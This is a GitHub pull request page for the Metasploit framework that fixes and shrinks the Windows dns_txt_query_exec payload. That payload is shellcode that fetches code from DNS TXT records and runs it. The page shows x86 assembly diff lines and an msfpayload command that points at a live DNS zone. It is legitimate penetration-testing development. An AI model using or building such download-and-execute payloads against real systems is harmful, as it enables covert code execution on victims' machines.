Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with
or
.
Download ZIP

Loading…

Improved payload dns_txt_query_exec #1057

Merged
merged 16 commits into from

3 participants

@corelanc0d3r

Fixed a possible payload crash on XP and Win7.
(did not test if patch works on other OSes)

Made payload a few bytes smaller

To test, feel free to run the setup at corelan.eu:

./msfpayload windows/dns_txt_query_exec DNSZONE=corelan.eu C

(you should get a messagebox)

@corelanc0d3r

tested on Win2003 R2 SP2 as well, works fine

@ChrisJohnRiley

Is this an extension of what we were working on in April? if so just let me know if you want the server-side delivery code

@corelanc0d3r

this is a bugfix to the existing module (which simply downloads payload) - the modules we worked on in April allow us to download an executable... Maybe it's time to review those modules again & see what needs to be done to make them work reliably

@ChrisJohnRiley

Ok, sorry did't want to hijack the thread... lets chat offline and get the ball rolling again!

... and we return you to your regularly scheduled programming

@corelanc0d3r

what ? is it evening already ? :)

@wchen-r7
Collaborator

Tested ok on Windows 7 SP1.

@wchen-r7 wchen-r7 merged commit 0bf92b5 into rapid7:master
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Oct 24, 2012
  1. @corelanc0d3r

    merge

    corelanc0d3r authored
Commits on Oct 29, 2012
  1. @corelanc0d3r
Commits on Oct 30, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Oct 31, 2012
  1. @corelanc0d3r
Commits on Nov 3, 2012
  1. @corelanc0d3r
Commits on Nov 6, 2012
  1. @corelanc0d3r
Commits on Nov 7, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r

    restored original file

    corelanc0d3r authored
Commits on Nov 8, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 9, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
Commits on Nov 12, 2012
  1. @corelanc0d3r
  2. @corelanc0d3r
  3. @corelanc0d3r
This page is out of date. Refresh to see the latest.
Showing with 7 additions and 7 deletions.
  1. +7 −7 modules/payloads/singles/windows/dns_txt_query_exec.rb
View
14 modules/payloads/singles/windows/dns_txt_query_exec.rb
@@ -160,7 +160,7 @@ def generate
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
- jmp next_mod ; Process this module
+ jmp.i8 next_mod ; Process this module
; actual routine
start:
@@ -195,7 +195,7 @@ def generate
mov bl,0x61 ; first query, start with 'a'
dnsquery:
- jmp get_dnsname ; get dnsname
+ jmp.i8 get_dnsname ; get dnsname
get_dnsname_return:
pop eax ; get ptr to dnsname (lpstrName)
@@ -215,7 +215,7 @@ def generate
call ebp ;
test eax, eax ; query ok ?
jnz jump_to_payload ; no, jump to payload
- jmp get_query_result ; eax = 0 : a piece returned, fetch it
+ jmp.i8 get_query_result ; eax = 0 : a piece returned, fetch it
get_dnsname:
@@ -225,9 +225,9 @@ def generate
get_query_result:
xchg #{bufferreg},edx ; save start of heap
pop #{bufferreg} ; heap structure containing DNS results
- mov eax,[#{bufferreg}] ; if first dword has a non-null value, then stop
- test eax,eax
- jnz prepare_payload ; jmp to payload
+ mov eax,[#{bufferreg}+0x18] ; check if value at offset 0x18 is 0x1
+ cmp eax,1
+ jne prepare_payload ; jmp to payload
add #{bufferreg},#{wTypeOffset} ; get ptr to ptr to DNS reply
mov #{bufferreg},[#{bufferreg}] ; get ptr to DNS reply
@@ -243,7 +243,7 @@ def generate
push edi ;
inc ebx ; increment sequence
xchg #{bufferreg},edx ; restore start of heap
- jmp dnsquery ; try to get the next piece, if any
+ jmp.i8 dnsquery ; try to get the next piece, if any
prepare_payload:
mov #{bufferreg},edx
Something went wrong with that request. Please try again.